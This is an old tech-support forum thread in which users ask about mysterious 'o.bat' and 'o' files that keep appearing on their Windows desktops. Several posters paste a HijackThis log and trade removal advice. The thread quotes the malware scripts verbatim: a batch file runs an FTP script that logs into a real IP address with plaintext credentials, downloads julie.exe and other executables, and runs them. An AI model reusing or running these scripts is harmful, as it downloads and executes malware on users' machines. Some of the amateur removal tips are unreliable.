What are these??

[Josh]

I keep getting "o.bat" on my desktop, it has:

if not exist C:\WINstatuslog ftp -s:o
if exist julie.exe julie.exe
if exist newdevin.exe newdevin.exe
if exist istinstall_154074.exe istinstall_154074.exe
if exist 06wu29rd.exe 06wu29rd.exe
if exist sd.exe sd.exe
if exist 449166.exe 449166.exe
if exist dp807615.exe dp807615.exe


I also have the file named "o" on my desktop, it has:


open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get newdevin.exe
get istinstall_154074.exe
get 06wu29rd.exe
get sd.exe
get 449166.exe
get dp807615.exe
bye


   ftp://tmpacct:[email protected]/
19 files in there, HOW do I stop this stupid [censored]? My AVs doesn't detect anything and I don't know what they are.
Anyone help me please, would be greatly appreciated.

[Guest]

More files on my desktop:

"Virus Hunter" = http://in.virushunter.com/track/MjY6Mzox/
"Privacy Protector" = http://www3.killevidence.com/cgi/click?a=1...111419&s=13&p=1
"Party Poker" = http://www.partypoker.com/index.htm?wm=2136628
"Popup Killer" = http://www3.killinternetpopups.com/cgi/cli...111419&s=16&p=1
"No More Spyware" = http://www3.killallspyware.com/cgi/click?a...111419&s=18&p=1
"Free Visa Card" = http://img.moneypluscard3.com/p/10000524683
"Free Credit Card" = http://img.usaplatinumcard.com/t/10000016374
"Cupid Cams" = http://www.cupidcams.com/hit.php?cid=715556


Screen Shots:
http://s92596198.onlinehome.us/Cheating/shyt/1.jpg (Task Manager)
http://s92596198.onlinehome.us/Cheating/shyt/bar.jpg (Toolbar)
http://s92596198.onlinehome.us/Cheating/sh...hyt/desktop.jpg (My Desktop!)
http://s92596198.onlinehome.us/Cheating/shyt/task2.jpg (Task Manager)

[guestolo]

Create a Permanent folder on your Hard Drive called HJT
EG...
C:\HJT
Download and save to that folder
Hijackthis

Do a SCAN----Scan will change to SAVE LOG----copy and paste the WHOLE contents of the log  here... Don't try and fix anything yet----It is all important

[Guest]

I'm not downloading that. I have scanned my computer with AVG, The Cleaner, Adaware 6, Spybot, and Spy Sweaper. Nothing got rid of this.

Also, now I'm getting a command prompt "File not found." when I log into windows.

[guestolo]

Well, I guess that is totally up to you
A lot of hijackthis logs posted on the Net everyday
I seen a couple entries that you posted that showed signs of Nasties

Ad-Aware, you running an old version
The latest version is Ad-Aware SE Personal 1.05
Spybot, I gotta wonder what version your running there, too

Hijackthis shows certain parts of the registry,
running processes, and active x controls---- that can help identify
what is running on your machine

Do yourself a favor and get the latest version of Ad-Aware
Also get the VX2 plugin for ad-aware and run it
This won't get you totally clean, but like you said
Your not downloading that!

Stay safe

[Guest]

Thanks,  I installed the newest Ad-Aware and scanned, and removed everything.

[guestolo]

Just to be safe you should make sure that you download
the VX2 plugin, if you didn't do it already for Ad-Aware
This link will show you how to download and install the Add-on
http://www.lavasoftusa.com/software/addons...x2cleaner.shtml

Let me know what it finds, if anything
I really wish you would post that hijackthis log, but I guess we'll have to hope your
system is actually clean

[entivore]

I HIGHLY recommend Hijack This.  I had the most recent Adaware and spybot search and destroy and removed everything they found but my browser was still being hijacked by something.  But because Hijack this doesn't target specific known problems, instead things that MIGHT be be problems based on how they affect your system, I was able to track down the problem.  

It was able to find some aantx.dll file the others missed, and a quick google turned up no legit info on aantx.dll so I deleted it, and low and behold, the problem's gone.  It is slightly dangerous however because it'll show all sorts of legit stuff and if you delete that you could mess up your system.

[Wayne]

Josh, I'm curious if you visited the www.wunderground.com Web site for weather information back on 27 September.  I have seen the same files/software installed on my machine on two different occasions during the past week at that site.  I'm sure there are many other sites where the "attack" can be picked up as well.

My initial reaction was to uninstall (Add/Remove Programs) the newly installed programs.  But, during the uninstalls my entire list of installed programs (in Add/Remove Programs) went blank.  The machine would no longer boot up Windows.  It took nearly four hours to get my machine back to normal using a registry restore with my machine booted in Command-Mode (MSDOS).

This happened to me a second time this week after visiting the offending site again (my stupidity) - but I recovered this time in ten minutes using the registry restore.

I am interested in any explanation as to what IE permission actually allows the triggering of an install on my machine.  I am using a dial-up internet connection with IE6.

[Guest]

I got these same files too and I hadn't visited the site you mentioned (see quote below).  However, I was also running IE6 with a dial-up connection.  I should also mention that since that happened (quite possibly a coincidence) my credit card information was stolen and used (with the card still in my wallet).  I am not sure how this person gained access to the card info but just in case it's related, be very wary of julie.exe et al.

Sarah

Josh, I'm curious if you visited the www.wunderground.com Web site for weather information back on 27 September. I have seen the same files/software installed on my machine on two different occasions during the past week at that site. I'm sure there are many other sites where the "attack" can be picked up as well.

[Guest]

I, too, have dial up (msn) and IE6......and have been finding the o.bat and an o file on my desktop.  I have just deleted them each time they appear (at some point while online) until today.  Today I decided to see what was inside and found in the bat file:

FTP.exe
Julie.exe
newdevin.exe
IF01.exe
isinstall_154074.exe
sd.exe
sdmsg.exe
TVM_B5.exe
06wu29rd.exe
449166.exe
dp807615.exe

In the o file:

if exist open    207.58.159/14
if exist open    tmpacct
if exist open    12345
                      bin
                     get julie.exe
                     get newdevin
                     and it continued to list "get" and then each of the .exe's listed in the bat file.  

Our computer is a family computer with multiple users, therefore, it may be difficult to pinpoint from where we "caught" the bug.  At this point, I haven't had any other icons appear on computer other than the two listed which tend to revisit my computer continually.  I have had my outlook express recently delete many of my folders and was in total disarray.  Also, my "accessories" folder disappeared from my start menu not too long ago.  I have no idea if the two are in any way connected to this newest problem.  I have Windows 98 which is no longer supported and that makes it tougher to get resolution.  

I use internet pay and am now concerned that my credit cards and other personal information could be stolen.  It is pathetic that others can hijack this information off of my computer when I don't even know where to find it myself!   http://images.thetechguide.com/forum/public/style_emoticons/<#EMO_DIR#>/sad.gif\' class=\'bbc_emoticon\' alt=\'\' />

Thanks for all the information.

[David J.]

Oh my!! This problem is killing me!  It all started last week, and I'm having the same problems as everyone has mentioned.  But here's the thing with me.  I have the most up to date software I can find.  Ad-Aware, SpyBot, etc.  I'm also running NIS2004 and PC-cillin 2002.  NIS is great at stopping the programs from accessing the internet and PC-cillin quarantines most of the files.   Ad-Aware and Spybot get rid of most of the stuff.  But I usually have to do alot of manual deletion in the registry and of files and folders that nothing will get rid of.  I get just about everything I can think of, but everything keeps coming back and I can't stop from happening.   I've run HJT many times, but I just don't know if I'm missing something or what.  From what I've read, this problem gets on the computer by the method of FTP and just raises hell.  Last week, I got so frustrated I reloaded my computer because of it.  Now my computer is more secure than it was before, but even after the fresh reload everything just goes to crap again.  I'm not too familiar with HJT, so here's my log, but I've got rid of some stuff that I know.  With this log, I haven't gone through and deleted stuff yet, and I just ran Ad-Aware and Spybot and obviously there is still stuff there.

Logfile of HijackThis v1.98.2
Scan saved at 11:25:13 AM, on 10/6/2004
Platform: Windows XP  (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Norton SystemWorks\Norton Utilities\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\PROGRA~1\NORTON~1\SPEEDD~1\nopdb.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Tmntsrv.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCPFW.exe
C:\WINDOWS\system32\winlogon.exe
C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe
C:\Program Files\MSI\Live Update 2\LMonitor.exe
C:\WINDOWS\System32\NVATray.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Trend Micro\PC-cillin 2002\WebTrap.EXE
C:\WINDOWS\System32\taskmgr.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\NaviSearch\bin\nls.exe
C:\Program Files\BullsEye Network\bin\bargains.exe
C:\Program Files\CashBack\bin\cashback.exe
C:\Documents and Settings\David\Desktop\Programs for reloads\hijackthis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.begin2search.com/sidesearch.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.begin2search.com/sidesearch.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.begin2search.com/sidesearch.html
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://fortress-of-solitude.mail.everyone....713724971960802
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.begin2search.com/sidesearch.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.begin2search.com/sidesearch.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R3 - URLSearchHook: (no name) - {E0DB1981-5BBF-D3C6-61B4-DA2888573D45} - C:\WINDOWS\Jricovqw.dll
O1 - Hosts file is located at: C:\WINDOWS\System32\drivers\etc\hosts
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {5C9C5BC0-9009-E5CF-2F7D-81985CF44FF2} - C:\WINDOWS\Jricovqw.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\WINDOWS\System32\nvms.dll
O2 - BHO: CB UrlCatcher Class - {CE188402-6EE7-4022-8868-AB25173A3E14} - C:\WINDOWS\System32\mscb.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Search - {6C2BA9F2-3BBE-A287-318E-B8A59EF57AB1} - C:\WINDOWS\Jricovqw.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe"
O4 - HKLM\..\Run: [PCCClient.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe"
O4 - HKLM\..\Run: [Pop3trap.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe"
O4 - HKLM\..\Run: [LiveMonitor] C:\Program Files\MSI\Live Update 2\LMonitor.exe
O4 - HKLM\..\Run: [NVIDIA nForce APU1 Utilities] NVATray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [LogonStudio] "C:\Program Files\WinCustomize\LogonStudio\logonstudio.exe" /RANDOM
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKLM\..\Run: [CashBack] C:\Program Files\CashBack\bin\cashback.exe
O4 - HKLM\..\Run: [NaviSearch] C:\Program Files\NaviSearch\bin\nls.exe
O4 - HKLM\..\Run: [EbatesMoeMoneyMaker0] "C:\Program Files\Ebates_MoeMoneyMaker\EbatesMoeMoneyMaker0.exe"
O4 - HKLM\..\Run: [BullsEye Network] C:\Program Files\BullsEye Network\bin\bargains.exe
O4 - HKLM\..\RunOnce: [djebmm350.exe] "C:\DOCUME~1\David\LOCALS~1\Temp\djebmm350.exe"
O4 - HKLM\..\RunOnce: [AAW] "C:\Program Files\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe" "+b1"
O4 - HKCU\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKCU\..\Run: [DealHelperDown] "C:\WINDOWS\Download.exe"
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Ebates - file://C:\Program Files\Ebates_MoeMoneyMaker\Sy350\Tp350\scri350a.htm
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Your PC is infected with Spyware - click here to fix your PC - {FB74C951-ACA1-4e33-A94C-A9261EB2CCB7} - https://www.spydeleter.com/order2.php?KBID=1063 (file missing)
O9 - Extra button: Ebates - {6685509E-B47B-4f47-8E16-9A5F3A62F683} - file://C:\Program Files\Ebates_MoeMoneyMaker\Sy350\Tp350\scri350a.htm (HKCU)

[Guest]

O2 - BHO: (no name) - {5C9C5BC0-9009-E5CF-2F7D-81985CF44FF2} - C:\WINDOWS\Jricovqw.dll
O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\WINDOWS\System32\nvms.dll
O2 - BHO: CB UrlCatcher Class - {CE188402-6EE7-4022-8868-AB25173A3E14} - C:\WINDOWS\System32\mscb.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)


These are VERY suspicious entries.  I'd delete all of these.

[entivore]

that last guest was me btw

[entivore]

R3 - URLSearchHook: (no name) - {E0DB1981-5BBF-D3C6-61B4-DA2888573D45} - C:\WINDOWS\Jricovqw.dll


delete that too, definantly.

[Guest_Sarah]

O9 - Extra button: Your PC is infected with Spyware - click here to fix your PC - {FB74C951-ACA1-4e33-A94C-A9261EB2CCB7} - https://www.spydeleter.com/order2.php?KBID=1063 (file missing)

Yes, I forgot to mention, I had "spy deleter" as well, before I had Julie.exe et al.  And BTW, please don't panic.  My credit card could have easily been duplicated.  This is happening more and more by people who make fake duplicates of cards and use them in stores.  The purchases were made using a live card (i.e., in a retail store) not just an account number.  So I don't really think julie.exe et al. took my financial data, but just be careful until you know what they are.
Also--how I got rid of the programs is that I have the program "Window Washer" (Webroot Software).  I used it to "shred" the unwanted program files rather than just delete them.  Not sure what the difference is, but so far, they haven't come back.  Also, make sure your windows software is updated so your system isn't vulnerable.
Sarah

[Guest]

[quote name=\'Wayne\' date=\'Oct 4 2004, 08:24 AM\']Josh, I'm curious if you visited the www.wunderground.com Web site for weather information back on 27 September.  I have seen the same files/software installed on my machine on two different occasions during the past week at that site.  I'm sure there are many other sites where the "attack" can be picked up as well.

My initial reaction was to uninstall (Add/Remove Programs) the newly installed programs.  But, during the uninstalls my entire list of installed programs (in Add/Remove Programs) went blank.  The machine would no longer boot up Windows.  It took nearly four hours to get my machine back to normal using a registry restore with my machine booted in Command-Mode (MSDOS).

This happened to me a second time this week after visiting the offending site again (my stupidity) - but I recovered this time in ten minutes using the registry restore.

I am interested in any explanation as to what IE permission actually allows the triggering of an install on my machine.  I am using a dial-up internet connection with IE6.[/quote]
 I haven't gone to the website, I do not look for weather information online. I'm thinking about just installing a different OS, since I have Windows ME (big resource problems)

[Josh]

Also, I should include, I still do get the o.bat file and things on desktop, and I think it's whenever "WUAUBOOT" is executed.

C:\Win\WUAUBOOT.exe

Every time, before I get the o.bat file, WUAUBOOT.exe is opened. I close it once it is opened so it doesn't download the other crap if that's what the bat file does.
I use Internet Explorer 5.50.4134.0100.

Thanks for everyones help, and good luck to everyone with the same problem, and for the person who owns that FTP,  you are pathetic.

[Guest]

The IP to that @#$! site is 207.58.159.14 so it shouldn't be too difficult to track down the owner right?  Even if it has been hijacked by someone else it could then be shut down.

[ZAPGOD]

http://images.thetechguide.com/forum/public/style_emoticons/<#EMO_DIR#>/ph34r.gif\' class=\'bbc_emoticon\' alt=\':ph34r:\' />
The file O.bat launches the FTP session to the contents of the file "O" if the file C:\WINDOWSstatuslog  does not exist.
If you place a blank file in the C:\  and name it WINDOWSstatuslog  (no extention) then it should keep the spyware and adware applications from downloading and installing.

Now, on another note how are O and O.bat getting on the system to begin with and what triggers O.bat??  

If you have a freshly infected system please post a text file of your internet history for the day that you were infected.  

I believe that there is an exploit in IE that is being used to install the initial hooks.

Also post what Operating system you were using, antivirus and definition files and windows patches have been installed.